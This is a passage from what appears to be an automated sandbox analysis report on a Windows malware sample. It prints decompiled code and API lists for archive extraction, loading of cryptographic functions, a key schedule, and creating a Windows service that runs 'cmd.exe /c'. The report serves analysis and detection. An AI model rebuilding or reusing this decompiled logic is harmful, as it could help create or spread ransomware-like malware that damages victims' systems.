							_t133 =  *_t280;
							if( *( *_t280 + 0x10) >= _t272) {
								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L00407700();
									_v12 = _t142;
									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t209 = __imp___mbsstr;
										_t274 =  &_v644;
										while(1) {
											L21:
											_t150 =  *_t274;
											if(_t150 != 0 && _t274[1] == 0x3a) {
												break;
											}
											if(_t150 == 0x5c || _t150 == 0x2f) {
												_t274 =  &(_t274[1]);
												continue;
											} else {
												_t151 =  *_t209(_t274, "\\..\\");
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}


















































                0x00406c40
                0x00406c40
                0x00406c4c
                0x00406c4f
                0x00406c52
                0x00406c56
                0x00406c59
                0x00407064
                0x00000000
                0x00407064
                0x00406c5f
                0x00406c64
                0x00000000
                0x00000000
                0x00406c6d
                0x00406c70
                0x00406c75
                0x00406c75
                0x00406c7c
                0x00406c7f
                0x00406ca0
                0x00406cec
                0x00406cf1
                0x00406cfa
                0x00406cfa
                0x00406cff
                0x00406d21
                0x00406d3e
                0x00406d52
                0x00406d5c
                0x00406d89
                0x00000000
                0x00406d89
                0x00406d5e
                0x00406d61
                0x00406d68
                0x00406d7e
                0x00406d95
                0x00406d9b
                0x00406dab
                0x00406db0
                0x00406db8
                0x00406dbe
                0x00406dbe
                0x00406dbe
                0x00406dc2
                0x00000000
                0x00000000
                0x00406dd0
                0x00406dd6
                0x00000000
                0x00406dd9
                0x00406ddf
                0x00406de5
                0x00406e11
                0x00406e11
                0x00406e11
                0x00000000
                0x00406e11
                0x00406ded
                0x00406df3
                0x00000000
                0x00000000
                0x00406dfb
                0x00406e01
                0x00000000
                0x00000000
                0x00406e09
                0x00406e0f
                0x00406e1b
                0x00406e20
                0x00406e28
                0x00406e2c
                0x00406e3c
                0x00406e3e
                0x00406e41
                0x00406e44
                0x00406e46
                0x00406e61
                0x00406e6b
                0x00406e6d
                0x00406e78
                0x00406e7a
                0x00406e7c
                0x00406e7c
                0x00406e7e
                0x00406e82
                0x00406e88
                0x00406e8a
                0x00406e8a
                0x00406e96
                0x00406e98
                0x00406e98
                0x00406ea3
                0x00406ea5
                0x00406ea5
                0x00406eae
                0x00406eb0
                0x00406eb0
                0x00406ebb
                0x00406ebd
                0x00406ebd
                0x00406eca
                0x00406ed3
                0x00406ee6
                0x00406ef2
                0x00406ef5
                0x00406efb
                0x00406efe
                0x00406f05
                0x00406f08
                0x00406f0e
                0x00406f14
                0x00406f1a
                0x00406f20
                0x00406f26
                0x00406f2c
                0x00407037
                0x00407039
                0x0040703b
                0x0040703c
                0x00407041
                0x00407048
                0x0040704f
                0x0040705a
                0x00000000
                0x00406f32
                0x00406f32
                0x00406f3a
                0x00406f41
                0x00406f45
                0x00406f4d
                0x00406f5d
                0x00000000
                0x00000000
                0x00406f62
                0x00406f6c
                0x00000000
                0x00000000
                0x00000000
                0x00406f6e
                0x00406f73
                0x00406f81
                0x00406f86
                0x00406f89
                0x00406f8f
                0x00406f92
                0x00406f94
                0x00406f99
                0x00406f9e
                0x00406fba
                0x00406fc0
                0x00406fc4
                0x00406fc4
                0x00406fcc
                0x00406fce
                0x00406fd3
                0x00406fd8
                0x00406ff4
                0x00406ffb
                0x00406ffb
                0x00407005
                0x00407007
                0x0040702a
                0x00407031
                0x00407031
                0x00000000
                0x00407005
                0x00406f2c
                0x00000000
                0x00406e0f
                0x00406dd0
                0x00406dcb
                0x00000000
                0x00406dcb
                0x00406d80
                0x00406d83
                0x00000000
                0x00406d88
                0x00000000
                0x00406d40
                0x00406d02
                0x00406cf9
                0x00406cf9
                0x00000000
                0x00406cf9
                0x00406cf4
                0x00000000
                0x00406cf4
                0x00000000
                0x00406c81
                0x00406c83
                0x00406ca2
                0x00406ca7
                0x00406caa
                0x00406cae
                0x00406cb1
                0x00406cb7
                0x00406cbd
                0x00406cc3
                0x00406cc9
                0x00406ccf
                0x00406cd5
                0x00406cdb
                0x00406ce1
                0x00407060
                0x00000000
                0x00407060
                0x00406c91
                0x00000000
                0x00406c96

                APIs
                • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: memcpy
                • String ID: /../$/..\$\../$\..\
                • API String ID: 3510742995-3885502717
                • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401A45() {
				void* _t1;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t11;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;

				_t15 =  *0x40f894; // 0x0
				if(_t15 != 0) {
					L8:
					_t1 = 1;
					return _t1;
				}
				_t11 = LoadLibraryA("advapi32.dll");
				if(_t11 == 0) {
					L9:
					return 0;
				}
				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
				_t9 = GetProcAddress(_t11, "CryptGenKey");
				_t17 =  *0x40f894; // 0x0
				 *0x40f8a8 = _t9;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 =  *0x40f898; // 0x0
				if(_t18 == 0) {
					goto L9;
				}
				_t19 =  *0x40f89c; // 0x0
				if(_t19 == 0) {
					goto L9;
				}
				_t20 =  *0x40f8a0; // 0x0
				if(_t20 == 0) {
					goto L9;
				}
				_t21 =  *0x40f8a4; // 0x0
				if(_t21 == 0 || _t9 == 0) {
					goto L9;
				} else {
					goto L8;
				}
			}












                0x00401a48
                0x00401a4f
                0x00401aec
                0x00401aee
                0x00000000
                0x00401aee
                0x00401a60
                0x00401a64
                0x00401af1
                0x00000000
                0x00401af1
                0x00401a7f
                0x00401a8c
                0x00401a99
                0x00401aa6
                0x00401ab3
                0x00401ab8
                0x00401aba
                0x00401ac0
                0x00401ac6
                0x00000000
                0x00000000
                0x00401ac8
                0x00401ace
                0x00000000
                0x00000000
                0x00401ad0
                0x00401ad6
                0x00000000
                0x00000000
                0x00401ad8
                0x00401ade
                0x00000000
                0x00000000
                0x00401ae0
                0x00401ae6
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: AddressProc$LibraryLoad
                • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                • API String ID: 2238633743-2459060434
                • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401CE8(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v1040;
				void* _t12;
				void* _t13;
				void* _t31;
				int _t32;

				_v12 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_v8 = _t12;
				if(_t12 != 0) {
					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
					_v16 = _t13;
					if(_t13 == 0) {
						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
						if(_t31 != 0) {
							StartServiceA(_t31, 0, 0);
							CloseServiceHandle(_t31);
							_v12 = 1;
						}
						_t32 = _v12;
					} else {
						StartServiceA(_t13, 0, 0);
						CloseServiceHandle(_v16);
						_t32 = 1;
					}
					CloseServiceHandle(_v8);
					return _t32;
				}
				return 0;
			}











                0x00401cfb
                0x00401cfe
                0x00401d06
                0x00401d09
                0x00401d21
                0x00401d29
                0x00401d2c
                0x00401d54
                0x00401d7b
                0x00401d7f
                0x00401d84
                0x00401d8b
                0x00401d91
                0x00401d91
                0x00401d98
                0x00401d2e
                0x00401d31
                0x00401d3a
                0x00401d42
                0x00401d42
                0x00401d9e
                0x00000000
                0x00401da7
                0x00000000

                APIs
                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Service$CloseHandleOpen$ManagerStart
                • String ID: cmd.exe /c "%s"
                • API String ID: 1485051382-955883872
                • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 54%
                			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
				signed int _v8;
				signed int _v12;
				char _v24;
				int _t193;
				signed int _t198;
				int _t199;
				intOrPtr _t200;
				signed int* _t205;
				signed char* _t206;
				signed int _t208;
				signed int _t210;
				signed int* _t216;
				signed int _t217;
				signed int* _t220;
				signed int* _t229;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t289;
				signed int _t290;
				signed char* _t291;
				signed int _t292;
				void* _t303;
				void* _t313;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char* _t317;
				signed char* _t319;
				signed int _t320;
				signed int _t322;
				void* _t326;
				void* _t327;
				signed int _t329;
				signed int _t337;
				intOrPtr _t338;
				signed int _t340;
				intOrPtr _t341;
				void* _t342;
				signed int _t345;
				signed int* _t346;
				signed int _t347;
				void* _t352;
				void* _t353;
				void* _t354;

				_t352 = __ecx;
				if(_a4 == 0) {
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t283 = _a12;
				_t252 = 0x18;
				_t342 = 0x10;
				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t193 = _a16;
				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_t193 =  &_v24;
					_push(0x40d570);
					_push(_t193);
					L0040776E();
				}
				 *(_t352 + 0x3cc) = _t193;
				 *(_t352 + 0x3c8) = _t283;
				memcpy(_t352 + 0x3d0, _a8, _t193);
				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
				_t198 =  *(_t352 + 0x3c8);
				_t354 = _t353 + 0x18;
				if(_t198 == _t342) {
					_t199 =  *(_t352 + 0x3cc);
					if(_t199 != _t342) {
						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
					} else {
						_t200 = 0xa;
					}
					goto L17;
				} else {
					if(_t198 == _t252) {
						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
						L17:
						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
						L18:
						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}

















































                0x00402a83
                0x00402a85
                0x00402a8e
                0x00402a95
                0x00402a9e
                0x00402aa3
                0x00402aa4
                0x00402aa4
                0x00402aa9
                0x00402aae
                0x00402ab1
                0x00402ab4
                0x00402ac2
                0x00402ac6
                0x00402acd
                0x00402ad6
                0x00402adb
                0x00402adc
                0x00402adc
                0x00402ae1
                0x00402ae6
                0x00402af4
                0x00402af8
                0x00402aff
                0x00402b05
                0x00402b08
                0x00402b0d
                0x00402b0e
                0x00402b0e
                0x00402b14
                0x00402b23
                0x00402b2a
                0x00402b3f
                0x00402b44
                0x00402b4a
                0x00402b4f
                0x00402b75
                0x00402b7d
                0x00402b92
                0x00402b7f
                0x00402b81
                0x00402b81
                0x00000000
                0x00402b51
                0x00402b53
                0x00402b70
                0x00402b94
                0x00402b94
                0x00402b9a
                0x00402ba2
                0x00402ba3
                0x00402ba6
                0x00402bae
                0x00402bb1
                0x00402bcf
                0x00402bcf
                0x00402bd7
                0x00402bf8
                0x00402c00
                0x00402c01
                0x00402c0b
                0x00402c0e
                0x00402c12
                0x00402c15
                0x00402c17
                0x00402c1f
                0x00402c22
                0x00402c4e
                0x00402c4e
                0x00402c54
                0x00402ca5
                0x00402ca8
                0x00402e04
                0x00402e06
                0x00402e0d
                0x00402e10
                0x00402e73
                0x00402e73
                0x00402e7b
                0x00402e7b
                0x00402e18
                0x00402e1b
                0x00402e1b
                0x00402e20
                0x00000000
                0x00000000
                0x00402e22
                0x00402e25
                0x00402e25
                0x00402e29
                0x00402e59
                0x00402e5b
                0x00402e5e
                0x00402e5e
                0x00402e61
                0x00402e61
                0x00402e64
                0x00402e68
                0x00402e6b
                0x00000000
                0x00402e1b
                0x00402cae
                0x00402cb5
                0x00402cb5
                0x00402cbf
                0x00402d05
                0x00402d0b
                0x00402d11
                0x00402d34
                0x00402d3a
                0x00402d3b
                0x00402d3e
                0x00402d40
                0x00402d43
                0x00402d43
                0x00402d46
                0x00402d4e
                0x00402d8f
                0x00402d95
                0x00402d9b
                0x00402d9c
                0x00402d9f
                0x00402da1
                0x00402da4
                0x00402da4
                0x00402da7
                0x00402da7
                0x00402dad
                0x00000000
                0x00000000
                0x00402daf
                0x00402db5
                0x00402dbf
                0x00402dc3
                0x00402dc8
                0x00402dc9
                0x00402dcf
                0x00402ddb
                0x00402dde
                0x00402de4
                0x00402de6
                0x00402de9
                0x00402dec
                0x00402df3
                0x00402df9
                0x00000000
                0x00000000
                0x00000000
                0x00402df9
                0x00000000
                0x00402db5
                0x00402d16
                0x00000000
                0x00000000
                0x00402d1c
                0x00402d22
                0x00402d25
                0x00402d28
                0x00402d2a
                0x00402d2d
                0x00402d2d
                0x00000000
                0x00402dfb
                0x00402dfb
                0x00000000
                0x00402cb5
                0x00402c56
                0x00402c5c
                0x00402c6a
                0x00402c6e
                0x00402c74
                0x00402c75
                0x00402c7e
                0x00402c8b
                0x00402c91
                0x00402c93
                0x00402c96
                0x00402c9d
                0x00402ca3
                0x00000000
                0x00000000
                0x00000000
                0x00402ca3
                0x00000000
                0x00402c5c
                0x00402c24
                0x00402c27
